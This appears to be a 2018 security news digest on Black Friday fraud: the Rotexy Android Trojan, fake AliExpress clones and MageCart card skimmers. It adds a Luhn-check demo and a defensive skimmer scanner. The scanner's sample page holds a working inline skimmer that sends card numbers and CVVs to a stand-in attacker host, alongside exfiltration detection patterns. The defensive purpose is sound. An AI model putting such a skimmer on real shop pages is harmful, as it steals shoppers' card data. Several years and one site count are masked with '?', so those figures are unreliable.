Security Week 48: Black Friday Hacking
The global holiday of consumption known as "Black Friday" is, fortunately, over. All that remains is to find out whether you saved money or lost it, and that question is not only about whether the purchased goods turned out to be useful. Sometimes what happens instead of a purchase is a leak of credit card details or a payment system account, followed by outright theft of money by cybercriminals. Mass sales are of interest to those who protect online payments, so last week also produced plenty of security research. Let's look at the most interesting of it.
In this issue: attacks on users by malware on personal computers and on mobile phones; attacks on online stores followed by theft of credit card data; and plain fake websites that sell nothing but take the public's money. We begin with the Rotexy Android Trojan investigated by Kaspersky Lab.
Rotexy (brief overview in the news item, full study) is a malware program for Android devices that was first detected in 2014. A distinguishing feature of this family of Trojans is the use of three channels at once to communicate with the command-and-control server: SMS, a direct Internet connection, and the Google Cloud Messaging service. The Trojan spreads via SMS containing a link to an infected APK named AvitoPay.apk or similar. If you have ever placed a classified ad and then received a strange SMS with a link saying "I'm ready to pay, click here", this was it (or something like it; there are many such programs). After installation and a request for device administrator rights, Rotexy sends the device's IMEI to the C2 server. In response it receives a set of rules that tell it how to process, for example, SMS messages from online banking services. The original post shows a screenshot of such a rule set.
Initially, communication between the infected phone and the C2 server was completely unencrypted; encryption appeared in 201?. In 201? phishing was added to the typical money-stealing toolkit (sending SMS, intercepting and deleting reply SMS from banks).
The most recent version of the malware, after requesting administrator rights, shows a stub claiming the application could not be installed. In reality the program hides its icon from the list of installed applications. If the user refuses the request for administrator rights, the screen starts flickering. Once installed, an attempt to stop the application forces the phone to reboot. Depending on the command sent by the C2 server, the Trojan can send itself to every contact in the phone, update itself, pass the contact list and messages to the attackers, fake an incoming SMS, display a phishing page or a page claiming the smartphone has been blocked, and then extort money. If the user enters card details on the phishing page, the Trojan can compare the last four digits with the information from the banking SMS and "recommend" entering the correct number.
More Trojans for computers and mobile phones are described in the Kaspersky Lab report for Black Friday (short Russian version; full version in English). The study gives an approximate breakdown of cybercriminals' areas of interest: in half of the cases, the victims' payment information is intercepted during purchases from online retailers (independent stores selling clothing and jewellery, for example, rather than electronics). Online marketplaces such as eBay or Alibaba are "covered" by malware far less often, perhaps because what is valuable there is no longer the card number but the user account. On the black market, PayPal accounts are offered most often, but Amazon and eBay accounts are also common.
Another way to take money from the public dishonestly is to create and promote fake websites that imitate popular online platforms. A study by Group-IB (news) reported the discovery of at least 400 clones of the AliExpress site alone. Last year's "Friday" study by Kaspersky Lab showed a significant increase in the share of purchases made from mobile devices, where recognising a fake website is even harder than in the desktop version. Finally, stealing payment details does not require attacking the end users at all. Since 201? information security researchers have been tracking the activity of the MageCart group, named after its attacks on the Magento CMS. This summer, for example, Ticketmaster, one of the largest ticketing services, was hit by them.
According to researcher Willem de Groot, in November competition broke out between members of the group (or between separate gangs) (news; post in the researcher's blog). On one site, several malicious scripts were found at once, each sending credit card numbers to criminals. One of them (the more advanced) not only collected card numbers but also sabotaged its competitors: in the data sent to the rivals' server, one digit of each card number was replaced by a simple randomizer (shown as a screenshot in the original post).
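As an added example (not code from the original post or from Willem de Groot's blog) of what the digit substitution described above does to the stolen data: any single-digit change breaks the Luhn checksum that payment card numbers satisfy, so whoever buys or uses the rival gang's dump receives numbers that fail the most basic validity check. This goes beyond the post, which only says that one digit was replaced. The card numbers below are published test numbers, not real accounts; `substituteDigit` is a deterministic stand-in for the skimmer's randomizer (an assumption: the real code's choice of position and value is not described on this page); and the exhaustive check demonstrates the general property rather than one case.

```javascript
// Added example, not code from the original post or the researcher's blog.
// Shows that the "replace one digit" sabotage always produces a card number
// that fails the Luhn check, so the tampering is detectable by the recipient.

// Standard Luhn (mod 10) check: double every second digit from the right,
// subtract 9 from doubles above 9, and require the digit sum to be a multiple of 10.
function luhnValid(pan) {
  const digits = pan.replace(/\D/g, '');
  if (digits.length < 12) return false;
  let sum = 0;
  let doubleIt = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (doubleIt) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    doubleIt = !doubleIt;
  }
  return sum % 10 === 0;
}

// Deterministic stand-in for the skimmer's randomizer (assumption: the real
// script picked the position and the new digit at random; the effect is the same).
function substituteDigit(pan, pos, replacement) {
  if (pan[pos] === replacement) throw new Error('replacement must differ from the original digit');
  return pan.slice(0, pos) + replacement + pan.slice(pos + 1);
}

// Every position, every other digit: does any single substitution survive Luhn?
// Returns true when all of them are caught (the expected result for any valid PAN).
function allSingleSubstitutionsFailLuhn(pan) {
  for (let pos = 0; pos < pan.length; pos++) {
    for (let d = 0; d <= 9; d++) {
      const r = String(d);
      if (r === pan[pos]) continue;
      if (luhnValid(substituteDigit(pan, pos, r))) return false;
    }
  }
  return true;
}

// Constructed input: well-known scheme test numbers (Visa, Mastercard), not real cards.
const TEST_PANS = ['4111111111111111', '5500000000000004'];

function demo() {
  return TEST_PANS.map(pan => ({
    pan,
    valid: luhnValid(pan),
    sabotagedSample: substituteDigit(pan, 5, pan[5] === '7' ? '3' : '7'),
    everySubstitutionCaught: allSingleSubstitutionsFailLuhn(pan),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```

Luhn is not a secret and not a security control; the point is that a buyer of the sabotaged dump can spot the corruption immediately, which is why the competing skimmer damages the rival's reputation rather than merely its yield.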
In this way one criminal group also spoils the reputation of another. According to the same researcher's data, over the past three months malicious code linked in one way or another to the MageCart campaign was discovered on more than five thousand sites; over three years, 4?000 sites have been infected. One online store was attacked 18 times in a row. On another, the attackers left a message for the administrators: stop deleting our scripts.
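A check a shop operator can run for the kind of injected script the story above describes, added here as an example (not the researcher's tooling and not code from the post): inventory every script tag in a saved copy of the checkout page, flag external sources whose host is not on an allowlist, and flag inline scripts that both read card fields and contain a network or encoding primitive skimmers use to ship data out. The hostnames, the allowlist, the indicator patterns and the sample HTML are all constructed for illustration. Real skimmers are obfuscated, so this catches only the crude cases and should be paired with a regular diff of the script inventory against a known-good baseline.

```javascript
// Added example, not code from the original post or from Willem de Groot's tools.
// Static scan of a saved checkout page for MageCart-style skimmers. Every host,
// pattern and the sample page below is constructed for illustration.

// Indicators that an inline script reads payment fields ...
const CARD_FIELD = /\b(?:cc[_-]?num(?:ber)?|card[_-]?number|cardnumber|cvv|cvc|expir)/i;
// ... and ships data somewhere (primitives skimmers commonly use for exfiltration).
const EXFIL = /XMLHttpRequest|\bfetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=|\bbtoa\s*\(/;

// Host of a script src; relative paths belong to the page's own host.
function hostOf(src, pageHost) {
  const m = /^(?:https?:)?\/\/([^/:?#]+)/i.exec(src.trim());
  return m ? m[1].toLowerCase() : pageHost.toLowerCase();
}

// Returns a list of findings; an empty list means no rule matched.
function findSuspiciousScripts(html, pageHost, allowedHosts) {
  const allowed = new Set([pageHost, ...allowedHosts].map(h => h.toLowerCase()));
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const srcAttr = /\bsrc\s*=\s*["']?([^"'\s>]+)/i;
  const findings = [];
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const src = srcAttr.exec(attrs);
    if (src) {
      const host = hostOf(src[1], pageHost);
      if (!allowed.has(host)) {
        findings.push({ kind: 'external-unlisted', host, src: src[1] });
      }
    } else if (CARD_FIELD.test(body) && EXFIL.test(body)) {
      findings.push({ kind: 'inline-exfil', snippet: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample page: the shop's own script, an allowlisted CDN, one unknown
// third-party tag, an inline skimmer that hooks the payment form and beacons the
// card data out through an image request, and a harmless inline script.
const SAMPLE_CHECKOUT = `
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example-shop.com/lib/jquery.js"></script>
<script src="//static-cdn.example-analytics.test/tag.js"></script>
</head><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script>
  document.getElementById('payment').addEventListener('submit', function () {
    var d = document.querySelector('[name=cc_number]').value + '|' +
            document.querySelector('[name=cvv]').value;
    new Image().src = 'https://collect.example-bad.test/i.gif?d=' + btoa(d);
  });
</script>
<script>
  window.pageViews = (window.pageViews || 0) + 1;
</script>
</body></html>`;

function scanSampleCheckout() {
  return findSuspiciousScripts(SAMPLE_CHECKOUT, 'shop.example', ['cdn.example-shop.com']);
}

console.log(JSON.stringify(scanSampleCheckout(), null, 2));
```

The unknown analytics host is reported even though the tag may be legitimate: on a checkout page every third-party script is a candidate skimmer until the allowlist says otherwise, and keeping that allowlist short is the actual control.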
The recommendations for preventing theft from credit cards and theft of payment system accounts remain the same despite the evolution of attack methods: protect devices from malware, use separate cards with a limited balance for online payments, and use two-factor authentication for both accounts and payments. And, returning to the story about the Android Trojan: do not click on links, even when they appear to come from someone you know.
Disclaimer: The opinions expressed in this digest may not always coincide with the official position of Kaspersky Lab. The editors generally recommend treating any opinion with healthy scepticism.
Author: weber
Published: 27-11-2018, 06:15
Category: Information Security / Payment systems